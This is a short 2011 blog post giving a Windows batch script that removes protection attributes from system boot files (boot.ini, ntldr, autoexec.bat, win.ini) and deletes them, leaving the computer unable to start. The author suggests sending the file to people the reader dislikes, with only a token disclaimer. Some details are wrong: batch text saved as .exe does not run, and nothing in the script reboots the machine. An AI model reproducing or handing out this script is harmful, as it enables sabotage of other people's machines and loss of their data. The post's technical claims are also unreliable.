Wednesday, October 26, 2011

Shutdown a Computer Forever

Open Notepad and type the following::


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

save it as extension .exe or .cmd

Don't try it it will reboot your computer and delete the bootable files.. It is only for your knowledge purpose..
If you want to hack other's computer whom you really don't like you can create or send this file to them.....
I am not responsible if you tried it on your own or to your friends.......

No comments:

Post a Comment